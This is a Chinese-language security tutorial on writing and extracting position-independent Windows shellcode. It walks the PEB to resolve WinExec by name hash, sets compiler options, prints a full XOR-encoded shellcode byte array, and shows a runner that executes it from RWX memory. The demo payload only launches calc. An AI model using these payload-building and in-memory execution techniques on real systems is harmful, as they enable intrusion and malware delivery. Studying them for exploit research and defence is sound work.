Windows shellcode编写和提取细节

原创： EDI-VOID 合天智汇

0x00 shellcode编写

首先shellcode的编写可以用纯汇编也可以用c++，其两者难易程度可想而知，还是抱住VS的大腿，不过这其中要注意一些代码格式和编译选项，以确保生成的shellcode是地址无关的

比如像如下代码都会被编译器优化，编译器会把字符串放在常量区，以下代码在vc6能通过，vs2017这些新版本的不能通过，新版本的语意更严谨。

char*arr = "test";

实际上是constchar*arr = "test";

Vc6中反汇编代码如下

可以看到字符串指针是一个固定的地址，在前面加上const关键字后会发现生成的代码是一样的，可见旧版本的编译器很善解人意，把你不严谨的代码改了

但是如果以以下的形式写的话，就成了地址无关的代码

charcmd[] = { 'c','a','l','c','\x00'};

这样写的需要我们在数组末尾手动添加截断字符

字符串的绝对地址引用问题解决了，下一个就是函数的调用，是dll的加载基址相关的，不同的操作系统某个dll的加载基址不一样，就需要动态定位，需要得到别的api的地址的话，首先我们需要得到dll的基址，可以通过进程PEB结构中的成员来遍历，遍历到kernel32.dll以后再遍历到GetProcAddress函数的地址和LoadLibrary的地址就万事大吉了，别的函数只需要这两个函数来获取了

首先获取PEB结构可以直接调用winternl.h里的一个宏

_PEB*peb = NtCurrentTeb()->ProcessEnvironmentBlock;

查看其宏定义看似调用了函数，查看反汇编代码发现实则是地址无关的代码

mov eax,dword ptr fs:[00000018h]

mov ecx,dword ptr [eax+30h]

也可以参照teb的结构自己来实现一个GetPeb函数让指令使用更少的字节

fs:[0x18]处是一个指向TEB自身的指针，TEB结构0x30处是PEB指针

得到PEB指针后

LIST_ENTRY*first = peb->Ldr->InMemoryOrderModuleList.Flink;

可以得到一个双向链表的头指针，但是这个指针指向的结构体并不是LDR_DATA_TABLE_ENTRY，而是里面的一个成员

所以要想得到节点所对应的LDR_DATA_TABLE_ENTRY结构体指针，我们需要在其基础上减去0x8，再解析这个结构体就ok了

这里的双向链表结尾的元素的Flink是指向头元素的，所以遍历之前保存头元素的指针，向尾部遍历检测Flink是不是等于头元素指针就ok了

对于dll的名字，我们可以查看BaseDllName这个成员，FullDllName和BaseDllName的类型是一样的，所以像下面这样获取dllname就好了

(decltype(dte->FullDllName)*)(DWORD*)&(dte->Reserved4))->Buffer

获取了dllname计算hash与我们记录好的hash进行比较，大小写字母的hash是一样的

但是这样获取到的是unicode字符串，我们在写一个getunicodehash就完事了

DWORDgetHash(constchar*str){
DWORDh = 0;
while(*str){
h= (h >> 13) | (h << (32 - 13));
h+= *str>= 'a'? *str- 32 : *str;
str++;
}
returnh;
}
DWORDgetunicodeHash(constwchar_t*str){
DWORDh = 0;
PWORDptr = (PWORD)str;
while(*ptr) {
h= (h >> 13) | (h << (32 - 13));
h+= (BYTE)(*ptr)>= 'a'? (BYTE)(*ptr)- 32 : (BYTE)(*ptr);
ptr++;
}
returnh;
}
最终代码如下
#include”pch.h”
#include<Windows.h>
#include<winnt.h>
#include<winternl.h>
DWORDgetHash(constchar*str){
DWORDh = 0;
while(*str){
h= (h >> 13) | (h << (32 - 13));
h+= *str>= 'a'? *str- 32 : *str;
str++;
}
returnh;
}
DWORDgetunicodeHash(constwchar_t*str){
DWORDh = 0;
PWORDptr = (PWORD)str;
while(*ptr) {
h= (h >> 13) | (h << (32 - 13));
h+= (BYTE)(*ptr)>= 'a'? (BYTE)(*ptr)- 32 : (BYTE)(*ptr);
ptr++;
}
returnh;
}
PVOIDgetWinExec() {
chardllname[] = { 'K','E','R','N','E','L','3','2','.','D','L','L','\x00'};
charapi[] = { 'W','i','n','E','x','e','c','\x00'};
_PEB*peb = NtCurrentTeb()->ProcessEnvironmentBlock;
LIST_ENTRY*first = peb->Ldr->InMemoryOrderModuleList.Flink;
LIST_ENTRY*ptr = first;
do{
LDR_DATA_TABLE_ENTRY*dte = (LDR_DATA_TABLE_ENTRY*)((BYTE*)ptr- 0x8);
BYTE*baseAddress = (BYTE*)dte->DllBase;
ptr= ptr->Flink;
if(!baseAddress)
continue;
PIMAGE_DOS_HEADERdosHeader = (PIMAGE_DOS_HEADER)baseAddress;
PIMAGE_NT_HEADERSntHeader = (PIMAGE_NT_HEADERS)(baseAddress+ dosHeader->e_lfanew);
DWORDiedRVA =ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
if(!iedRVA)
continue;
PIMAGE_EXPORT_DIRECTORYied = (PIMAGE_EXPORT_DIRECTORY)(baseAddress+ iedRVA);
if(getunicodeHash(((decltype(dte->FullDllName)*)(DWORD*)&(dte->Reserved4))->Buffer)==getHash(dllname)){
DWORD*nameRVAs = (DWORD*)(baseAddress+ ied->AddressOfNames);
for(DWORDi = 0; i < ied->NumberOfNames; i++) {
char*funcName = (char*)(baseAddress+ nameRVAs[i]);
if(getHash(funcName)==getHash(api)) {
WORDordinal = ((WORD*)(baseAddress + ied->AddressOfNameOrdinals))[i];
DWORDfunctionRVA = ((DWORD*)(baseAddress + ied->AddressOfFunctions))[ordinal];
returnbaseAddress + functionRVA;
}
}
}
}while(ptr != first);
returnNULL;
}
voidfunc() {
charcalc[] = { 'c','a','l','c','\x00'};
decltype(WinExec)*myWinExec = (decltype(WinExec)*)getWinExec();
myWinExec(calc,0);
}
intmain()
{
func();
return0;
}

编译运行一下就弹出了calc

下面提取shellcode

我们把主要的逻辑放到了func这个函数里

下面要配置一下编译选项方便我们提取shellcode

关闭SDL检查，优化里面使大小最小化，这会缩小shellcode的体积

内联函数扩展选择只适用于_inline(Ob1),因为我们的func函数太短了，并且我们不希望编译器优化把他给内联了，func当成一个单独的函数方便我们提取，这样就需要选择只适用于_inline(Ob1)

启用内部函数选择是(/Oi)

禁用安全检查(/Gs-)

其中像NtCurrentTeb这个宏里的__readfsdword就是内部函数，启用内部函数会把这些函数调用内联到我们的代码

优化大小或者速度选择代码大小优先(/Os)

全程序优化选择是(/GL)

代码生成中的安全检查选择禁用，如果开启的话编译器会插入一些检查gscookie的函数调用啥的

启用函数级链接选择是(/Gy)这个可以移除没有被调用的函数

然后是链接器配置

常规中的启用增量链接选择否(/INCREMENTAL:NO)

调试中的生成映射文件选择是(/MAP)这个生成的mapfile可以帮助我们定位函数的位置和长度

映射文件名:mapfile，随便你指定

启用COMDAT折叠:是(/OPT:ICF)

函数顺序:function_order.txt，这个选项可以告诉编译器编译后的代码中函数的排列顺序，我们用shellcode的时候肯定从shellcode的起始位置开始运行，这样我们要把那个func函数放在线性地址的开头

我们先生成一下，在mapfile里找到func函数,即?func@@YAXXZ

所以我们的function_order.txt里只需要放一行?func@@YAXXZ就可以了

在vs2017中还要“常规”—>“调试信息格式”—>选择“程序数据库(/Zi)”或“无”

还有基本运行时检查改成默认值

0x01 shellcode提取与运行

用MassimilianoTomassoli的shellcode提取工具提取shellcode进行测试

intmain()
{
charshellcode[] =
"\xe8\xff\xff\xff\xff\xc0\x5f\xb9\x54\x03\x02\x02\x81\xf1\x02\x02"
"\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x01\x0f\x44\xc6\xaa"
"\xe2\xf6\x55\x8b\xec\x51\x51\xc7\x45\xf8\x63\x61\x6c\x63\xc6\x45"
"\xfc\x01\xe8\x60\x01\x01\x01\x6a\x01\x8d\x4d\xf8\x51\xff\xd0\xc9"
"\xc3\x64\xa1\x18\x01\x01\x01\xc3\x53\x56\x8b\xf1\x33\xd2\xeb\x12"
"\x0f\xbe\xcb\xc1\xca\x0d\x80\xfb\x61\x8d\x41\xe0\x0f\x4c\xc1\x03"
"\xd0\x46\x8a\x1e\x84\xdb\x75\xe8\x5e\x8b\xc2\x5b\xc3\x53\x56\x33"
"\xdb\x57\x8b\xf9\x8b\xf3\xeb\x14\x0f\xb6\x17\xc1\xce\x0d\x80\x3f"
"\x61\x8d\x7f\x02\x8d\x4a\xe0\x0f\x42\xca\x03\xf1\x66\x39\x1f\x75"
"\xe7\x5f\x8b\xc6\x5e\x5b\xc3\x55\x8b\xec\x83\xec\x28\x64\xa1\x18"
"\x01\x01\x01\x53\x56\x57\x8b\x40\x30\xc7\x45\xd8\x4b\x45\x52\x4e"
"\xc7\x45\xdc\x45\x4c\x33\x32\xc7\x45\xe0\x2e\x44\x4c\x4c\x8b\x40"
"\x0c\xc6\x45\xe4\x01\xc7\x45\xe8\x57\x69\x6e\x45\xc7\x45\xec\x78"
"\x65\x63\x01\x8b\x58\x14\x8b\xc3\x89\x5d\xfc\x8b\x7b\x10\x8d\x0b"
"\x8b\x1b\x85\xff\x74\x6b\x8b\x47\x3c\x8b\x54\x38\x78\x89\x55\xf8"
"\x85\xd2\x74\x5a\x8b\x49\x28\xe8\x71\xff\xff\xff\x8d\x4d\xd8\x8b"
"\xf0\xe8\x42\xff\xff\xff\x3b\xf0\x75\x44\x8b\x75\xf8\x33\xc9\x89"
"\x4d\xf8\x8b\x44\x3e\x20\x03\xc7\x89\x45\xf4\x39\x4c\x3e\x18\x76"
"\x2d\x8d\x4d\xe8\xe8\x1f\xff\xff\xff\x89\x45\xf0\x8b\x45\xf8\x8b"
"\x4d\xf4\x8b\x0c\x81\x03\xcf\xe8\x0c\xff\xff\xff\x3b\x45\xf0\x74"
"\x1b\x8b\x45\xf8\x40\x89\x45\xf8\x3b\x44\x3e\x18\x72\xe1\x8b\x45"
"\xfc\x3b\xd8\x75\x86\x33\xc0\x5f\x5e\x5b\xc9\xc3\x8b\x4d\xf8\x8b"
"\x44\x3e\x24\x8d\x04\x48\x0f\xb7\x0c\x38\x8b\x44\x3e\x1c\x8d\x04"
"\x88\x8b\x04\x38\x03\xc7\xeb\xdf";
void*ptr=VirtualAlloc(0, sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
memcpy(ptr,shellcode, sizeof(shellcode));
((void(*)())ptr)();
return0;
}

运行一下成功弹出了calc

下面我们一起来看看这个都脚本做了什么

首先我们先总结一下我们exe的现状，关键逻辑的部分没有绝对地址的引用，都是地址无关的代码，我们的func函数被放到了线性地址的开头，在所有其他的函数之前，_main函数在我们定义的所有的函数的末尾

如图所示

_main函数在最后一个，那么他的起始地址就是我们shellcode的长度了，即前面我们从func开始所有的函数的集合的长度

第一步就是获取这个长度

获取.text节中这个长度的shellcode，然后给shellcode添加loader，接着修复重定位，查找shellcode里不包含的byte，范围0x00到0xff，找到shellcode里不存在的byte就可以进行异或加密，从而剔除\x00截断字符了，最后再添加解密代码进去，如果没有不存在的字符的话，如果shellcode涉及的字符范围很全面，我们就没有可以挑选来进行异或的操作数了，这样可以把shellcode适当分成两部分或者多部分，分别用不同的操作数进行异或操作

其他的不用说，我们主要看看两个loader处用到的技巧

q	# call here
# here:
# ...
# shellcode_start:
# <shellcode>
# relocs:
# off1|off2|...
# str1|str2|...
code= [
0xE8,0x00, 0x00, 0x00, 0x00, # CALL here
#here:
0x5E, # POP ESI
0x8B,0xFE, # MOV EDI, ESI
0x81,0xC6, x[0], x[1], x[2], x[3], # ADD ESI, shellcode_start +len(shellcode) - here
0xB9,y[0], y[1], y[2], y[3], # MOV ECX, len(relocs)
0xFC, # CLD
#again:
0xAD, # LODSD
0x01,0x3C, 0x07, # ADD [EDI+EAX], EDI
0xE2,0xFA # LOOP again
#shellcode_start:
	]

这里第一句的call，因为我们不能直接操作指令指针寄存器，我们可以通过call下一条指令来压入下一条指令的地址，然后通过popesi放到esi寄存器里，然后参照后面的relocs修正相对偏移

然后异或加密剔除\x00的部分

code= [
0xE8,0xFF, 0xFF, 0xFF, 0xFF, # CALL $ + 4
#here:
0xC0, # (FF)C0 = INC EAX
0x5F, # POP EDI
0xB9,xor1[0], xor1[1], xor1[2], xor1[3], # MOV ECX, <xorvalue 1 for shellcode len>
0x81,0xF1, xor2[0], xor2[1], xor2[2], xor2[3], # XOR ECX, <xorvalue 2 for shellcode len>
0x83,0xC7, 29, # ADD EDI,shellcode_begin - here
0x33,0xF6, # XOR ESI, ESI
0xFC, # CLD
#loop1:
0x8A,0x07, # MOV AL, BYTE PTR[EDI]
0x3C,missing_byte, # CMP AL, <missingbyte>
0x0F,0x44, 0xC6, # CMOVE EAX, ESI
0xAA, # STOSB
0xE2,0xF6 # LOOP loop1
#shellcode_begin:
]

获取当前eip的地址方式与上面一样，只不过是这次的loader本身也不能包含空字节，指令的解码方式是，E8是call指令，后面的地址要加上当前指令的长度才是真正的偏移，E8FF FF FF FF FF 是跳转到-1+5的位置即最后一个FF处，这样就又组成了一句FFC0汇编指令，巧妙地避开了0x00空字节

然后处理了shellcode长度中可能出现的空字节，与之前的找missingbyte用的同样的方法，然后对shellcode进行异或解密，最后运行shellcode

相关实验

1. shellcode编写：

http://www.hetianlab.com/expc.do?ec=ECID172.19.104.182014050817262500001（了解shellcode编写规则）

2. shellcode编写练习：http://www.hetianlab.com/expc.do?ec=ECID172.19.104.182014071816144300001（掌握shellcode的编写）

最后偷偷给自己博客和和合天实验室打个广告

博客http://sayhi2urmom.top/

合天实验室http://www.hetianlab.com/里面好多优质学习资源的呦

本文为合天原创，未经允许，严禁转载。